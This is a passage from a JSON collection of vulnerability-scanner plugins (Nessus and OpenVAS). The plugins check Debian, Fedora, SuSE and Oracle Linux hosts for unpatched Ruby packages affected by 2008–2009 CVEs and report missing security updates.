script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"irb1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbm-ruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libgdbm-ruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libopenssl-ruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libreadline-ruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libruby1.9-dbg\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libtcltk-ruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"rdoc1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ri1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-dev\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-elisp\", reference:\"1.9.0+20060609-1etch3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ruby1.9-examples\", reference:\"1.9.0+20060609-1etch3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:43", "description": "Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing 'taintness' checks in dl module\n- CVE-2008-3905 - resolv.rb adds random transactions ids and source\nports to prevent DNS spoofing attacks\nhttp://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\nrexml/ - CVE-2008-3790 - DoS in the REXML module One issue not covered\nby any upstream advisory: - CVE-2008-3443 - DoS in the regular\nexpression engine\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2008-10-10T00:00:00", "title": "Fedora 9 : ruby-1.8.6.287-2.fc9 (2008-8738)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-1447", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-10T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:9", "p-cpe:/a:fedoraproject:fedora:ruby"], "id": "FEDORA_2008-8738.NASL", "href": "https://www.tenable.com/plugins/nessus/34380", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8738.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34380);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1447\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_bugtraq_id(30131, 30644, 30682, 30802);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"FEDORA\", value:\"2008-8738\");\n\n script_name(english:\"Fedora 9 : ruby-1.8.6.287-2.fc9 (2008-8738)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream release fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.ruby-lang.org/en/news/2008/08/08/multiple-\nvulnerabilities-in-ruby/ - CVE-2008-3655 - multiple insufficient safe\nmode restrictions - CVE-2008-3656 - WEBrick DoS vulnerability (CPU\nconsumption) - CVE-2008-3657 - missing 'taintness' checks in dl module\n- CVE-2008-3905 - resolv.rb adds random transactions ids and source\nports to prevent DNS spoofing attacks\nhttp://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\nrexml/ - CVE-2008-3790 - DoS in the REXML module One issue not covered\nby any upstream advisory: - CVE-2008-3443 - DoS in the regular\nexpression engine\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/08/multiple-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=449345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=458966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=459266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=460134\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015199.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bc21b07b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"ruby-1.8.6.287-2.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:13:53", "description": "This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates.\n\nThe entropy of DNS identifiers was increased (CVE-2008-3905) to avaid\nspoofing attacks.\n\nThe code for parsing XML data was vulnerable to a denial of service\nbug. (CVE-2008-3790)\n\nAn attack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load.\n\nRuby's access restriction code (CVE-2008-3655) as well as safe-level\nhandling using function DL.dlopen() (CVE-2008-3657) and big decimal\nhandling (CVE-2009-1904) was improved.\n\nBypassing HTTP basic authentication (authenticate_with_http_digest) is\nnot possible anymore.", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : ruby (SAT Patch Number 1073)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2009-1904", "CVE-2008-3443", "CVE-2009-0642", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:ruby-doc-html", "p-cpe:/a:novell:suse_linux:11:ruby", "p-cpe:/a:novell:suse_linux:11:ruby-tk"], "id": "SUSE_11_RUBY-090703.NASL", "href": "https://www.tenable.com/plugins/nessus/41452", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41452);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2009-0642\", \"CVE-2009-1904\");\n\n script_name(english:\"SuSE 11 Security Update : ruby (SAT Patch Number 1073)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates.\n\nThe entropy of DNS identifiers was increased (CVE-2008-3905) to avaid\nspoofing attacks.\n\nThe code for parsing XML data was vulnerable to a denial of service\nbug. (CVE-2008-3790)\n\nAn attack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load.\n\nRuby's access restriction code (CVE-2008-3655) as well as safe-level\nhandling using function DL.dlopen() (CVE-2008-3657) and big decimal\nhandling (CVE-2009-1904) was improved.\n\nBypassing HTTP basic authentication (authenticate_with_http_digest) is\nnot possible anymore.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=415678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=420084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=423234\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=478019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=509914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=511568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3443.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3655.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3657.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3790.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3905.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0642.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1904.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1073.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 189, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"ruby-1.8.7.p72-5.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"ruby-1.8.7.p72-5.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"ruby-1.8.7.p72-5.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"ruby-doc-html-1.8.7.p72-5.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"ruby-tk-1.8.7.p72-5.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:47:02", "description": "This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates. The entropy of DNS identifiers was increased\n(CVE-2008-3905) to avaid spoofing attacks. The code for parsing XML\ndata was vulnerable to a denial of service bug (CVE-2008-3790). An\nattack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load. Ruby's access restriction code (CVE-2008-3655)\nas well as safe-level handling using function DL.dlopen()\n(CVE-2008-3657) and big decimal handling (CVE-2009-1904) was improved.\nBypassing HTTP basic authentication (authenticate_with_http_digest) is\nnot possible anymore.", "edition": 25, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : ruby (ZYPP Patch Number 6338)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2009-1904", "CVE-2008-3443", "CVE-2009-0642", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_RUBY-6338.NASL", "href": "https://www.tenable.com/plugins/nessus/51760", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51760);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2009-0642\", \"CVE-2009-1904\");\n\n script_name(english:\"SuSE 10 Security Update : ruby (ZYPP Patch Number 6338)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby update improves return value checks for openssl function\nOCSP_basic_verify() (CVE-2009-0642) which allowed an attacker to use\nrevoked certificates. The entropy of DNS identifiers was increased\n(CVE-2008-3905) to avaid spoofing attacks. The code for parsing XML\ndata was vulnerable to a denial of service bug (CVE-2008-3790). An\nattack on algorithm complexity was possible in function\nWEBrick::HTTP::DefaultFileHandler() while parsing HTTP requests\n(CVE-2008-3656) as well as by using the regex engine (CVE-2008-3443)\ncausing high CPU load. Ruby's access restriction code (CVE-2008-3655)\nas well as safe-level handling using function DL.dlopen()\n(CVE-2008-3657) and big decimal handling (CVE-2009-1904) was improved.\nBypassing HTTP basic authentication (authenticate_with_http_digest) is\nnot possible anymore.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3443.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3655.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3657.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3790.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3905.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0642.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1904.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6338.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 189, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"ruby-1.8.6.p369-0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Oracle Linux Local Security Checks ELSA-2008-0897", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122548", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0897", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0897.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122548\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:47:46 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0897\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0897 - ruby security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0897\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0897.html\");\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~5.el5_2.5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-04-09T11:40:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830489", "href": 